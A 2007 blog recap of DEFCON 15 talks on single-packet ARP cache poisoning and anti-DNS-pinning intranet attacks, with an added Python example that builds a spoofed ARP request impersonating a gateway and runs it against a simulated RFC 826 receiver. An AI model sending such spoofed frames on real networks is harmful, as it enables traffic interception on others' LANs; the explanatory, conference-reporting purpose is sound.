network shenanigans or just smoke and mirrors

DEFCON 15: Day 3 Recap

August 5th, 2007 by geezer

The third day of DEFCON is always a slow day, at least for me. Many people party their asses off Saturday night only to either stumble into the early morning sessions half drunk or just not show up at all. As for me, neither scenario held. I was only interested in two talks, both of which turned out to be excellent!

First up for me was Jesse D’Aguanno’s “LAN Protocol Attack – ARP Reloaded.” He began by reviewing the traditional ways to perform ARP cache poisoning and the weaknesses of those techniques in today’s LAN environments. He detailed both client cache limitations and switch CAM (Content-Addressable Memory) tables.

The technique is rather trivial once explained. In the past, most people sent unsolicited (“gratuitous”) ARP replies to the target or to the broadcast address on a network. The attacker had to keep up this ARP flood in order to pull off the attack, which is noisy and easy to spot. However, Jesse noticed from reading the ARP RFC (RFC 826) that when a target receives an ARP request for its own IP address, it adds the request’s sender IP/MAC pair to its ARP cache before answering. Since the sender fields in that request are whatever the attacker writes, a single request that claims the gateway’s IP lives at the attacker’s MAC poisons the target’s cache. The beauty is that the attack now takes place with a single packet, and a plain ARP request looks like normal LAN traffic! Genius!! Simple and written in black and white, but genius! One caveat: how strictly a given stack follows the RFC (whether it creates a brand new entry from a request or only refreshes one it already has, and whether it honors requests not addressed to it) varies by implementation, so the entry also gets corrected the next time the target sees legitimate ARP traffic from the real owner. I always felt that if more people took the time to actually read RFCs (yawn!) then more tricks like this could be found. I like this.
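To make the RFC 826 reasoning concrete, here is an added example (my own illustration, not code from the talk or from this post). It builds a raw Ethernet/ARP frame with pure Python, then runs it through a toy receiver that follows the cache-update steps exactly as RFC 826 spells them out: merge an existing entry for the sender IP, stop unless the packet targets my IP, otherwise add the sender pair and answer. The hosts, MACs and the 10.0.0.0/24 addresses are constructed for the demo, and the receiver is a model of the RFC text, not of any particular OS stack.

```python
import struct
from dataclasses import dataclass

# Constructed example: hypothetical LAN, none of these addresses are real.
ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"
ZERO_MAC = "00:00:00:00:00:00"


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def ip_bytes(ip: str) -> bytes:
    return bytes(int(o) for o in ip.split("."))


def ip_str(b: bytes) -> str:
    return ".".join(str(x) for x in b)


@dataclass
class Arp:
    op: int
    sender_mac: str
    sender_ip: str
    target_mac: str
    target_ip: str


def build_arp_frame(op, sender_mac, sender_ip, target_mac, target_ip, dst_mac=BROADCAST) -> bytes:
    """Ethernet II header followed by an RFC 826 body for IPv4-over-Ethernet (42 bytes)."""
    eth = mac_bytes(dst_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    body = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)  # htype, ptype, hlen, plen, oper
            + mac_bytes(sender_mac) + ip_bytes(sender_ip)
            + mac_bytes(target_mac) + ip_bytes(target_ip))
    return eth + body


def parse_arp_frame(frame: bytes) -> Arp:
    if struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    body = frame[14:42]
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", body[:8])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("unsupported ARP encoding")
    return Arp(op, mac_str(body[8:14]), ip_str(body[14:18]),
               mac_str(body[18:24]), ip_str(body[24:28]))


class Rfc826Host:
    """Receiver-side cache logic as written in the RFC 826 'Packet Reception' algorithm."""

    def __init__(self, ip: str, mac: str):
        self.ip, self.mac, self.cache = ip, mac, {}

    def receive(self, frame: bytes):
        arp = parse_arp_frame(frame)
        merged = False
        # Step 1: a sender IP we already know gets its MAC overwritten, even if the
        # packet is not for us (this is why the real owner's next broadcast repairs us).
        if arp.sender_ip in self.cache:
            self.cache[arp.sender_ip] = arp.sender_mac
            merged = True
        # Step 2: only packets that target our own IP go any further.
        if arp.target_ip != self.ip:
            return None
        # Step 3: not merged yet -> add the sender pair. The one-packet attack lives here.
        if not merged:
            self.cache[arp.sender_ip] = arp.sender_mac
        # Step 4: a request is answered with a unicast reply to the claimed sender.
        if arp.op == ARP_REQUEST:
            return build_arp_frame(ARP_REPLY, self.mac, self.ip, arp.sender_mac,
                                   arp.sender_ip, dst_mac=arp.sender_mac)
        return None


def single_request_poison(victim_ip: str, attacker_mac: str, impersonated_ip: str) -> bytes:
    """One broadcast ARP request whose sender fields claim impersonated_ip lives at attacker_mac."""
    return build_arp_frame(ARP_REQUEST, attacker_mac, impersonated_ip, ZERO_MAC, victim_ip)


GATEWAY_IP, GATEWAY_MAC = "10.0.0.1", "aa:aa:aa:aa:aa:aa"
ATTACKER_MAC = "cc:cc:cc:cc:cc:cc"


def demo_poison():
    """Returns (victim's cached MAC for the gateway, who the victim replied to)."""
    victim = Rfc826Host("10.0.0.5", "bb:bb:bb:bb:bb:bb")
    reply = victim.receive(single_request_poison(victim.ip, ATTACKER_MAC, GATEWAY_IP))
    return victim.cache[GATEWAY_IP], parse_arp_frame(reply).target_mac


def demo_repair():
    """After poisoning, a legitimate broadcast request from the real gateway undoes it (step 1)."""
    victim = Rfc826Host("10.0.0.5", "bb:bb:bb:bb:bb:bb")
    victim.receive(single_request_poison(victim.ip, ATTACKER_MAC, GATEWAY_IP))
    victim.receive(build_arp_frame(ARP_REQUEST, GATEWAY_MAC, GATEWAY_IP, ZERO_MAC, "10.0.0.9"))
    return victim.cache[GATEWAY_IP]


if __name__ == "__main__":
    print("after one request:", demo_poison())
    print("after gateway's own broadcast:", demo_repair())
```

The interesting detail is that the victim not only caches the spoofed pair but sends its unicast reply straight to the attacker’s MAC, and that a request for somebody else’s IP does not create a new entry (step 2 stops it) yet does refresh an existing one (step 1), which is exactly why the attacker has to re-send whenever the real gateway broadcasts.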

The second talk was “Intranet Invasion with Anti-DNS Pinning” by David Byrne. For some background on DNS pinning, go here and here. The talk was great because not only did David confirm all I’ve read on the net about this technique, but he also demonstrated actual attacks live. He was able to trick a victim into loading and running some JavaScript that eventually allowed the attacker to run a Nessus scan of the internal network from an outside location. This holds extreme potential for some serious intranet attacks from the outside world.

Every year my goal is to come away from DEFCON with just one new technique that I can play with and improve upon. This year I was fortunate to find at least three: (1) the use of SMB/CIFS and WPAD to gain access to targets without needing an exploit, (2) the ability to perform ARP poisoning in a stealthy manner and (3) the ability to infiltrate an intranet from the outside using anti-DNS pinning techniques.

In addition to the technical gems found, I feel the information gleaned from the two panel discussions, “Meet the VCs” and “Self-Publishing in the Underground,” will help me with my own professional and career development plans. Overall, DEFCON 15 turned out to be better than I had hoped. Now maybe I can go out and enjoy Vegas before my 7:00 am flight tomorrow!

Posted in Chatter
